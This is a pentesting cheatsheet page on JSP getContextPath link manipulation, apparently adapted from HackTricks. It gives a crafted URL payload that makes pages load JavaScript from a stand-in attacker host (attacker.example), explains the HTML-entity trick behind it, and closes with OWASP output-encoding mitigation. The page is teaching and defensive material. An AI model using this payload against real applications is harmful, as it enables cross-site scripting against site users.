daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

jsp.md (2287B)


      1 ---
      2 title: "JSP"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/pentesting-web/jsp.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-web/jsp.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # JSP
     14 
     15 ## `getContextPath()` Link Manipulation
     16 
     17 Some JSP applications prepend `request.getContextPath()` to relative resource URLs in attributes such as `src`, `href`, or `action`. If a servlet container incorporates attacker-controlled path parameters into that value and the template does not apply HTML-attribute encoding, HTML character references can transform the rendered value into a protocol-relative URL on an attacker-controlled host.<sup>[[1]](#references)</sup>
     18 
     19 ```text
     20 http://127.0.0.1:8080/&sol;attacker.example/xss.js&num;/..;/..;/contextPathExample/test.jsp
     21 ```
     22 
     23 In an affected page, the browser decodes `&sol;` as `/` and `&num;` as `#`. A generated resource URL can therefore begin with `//attacker.example/xss.js`, while the fragment hides the remaining path. If this value reaches a `<script src>` attribute, the page loads attacker-controlled JavaScript and the issue becomes XSS; other resource attributes may enable related content injection.<sup>[[1]](#references)</sup>
     24 
     25 ![Developer tools showing page resources redirected to an external host through getContextPath manipulation](https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/188de82beb54e70956b2952367a0af91d26758b8/src/images/image%20%28326%29.png)
     26 
     27 Apply context-appropriate output encoding to dynamic values placed in HTML attributes. For a URL embedded in an attribute, OWASP recommends URL encoding followed by HTML-attribute encoding; using a fixed, trusted resource base also avoids deriving an origin from request-controlled path data.<sup>[[2]](#references)</sup>
     28 
     29 ## References
     30 
     31 - [1] [JSP ContextPath Link Manipulation - XSS](https://blog.rakeshmane.com/2020/04/jsp-contextpath-link-manipulation-xss.html)
     32 - [2] [OWASP Cross-Site Scripting Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)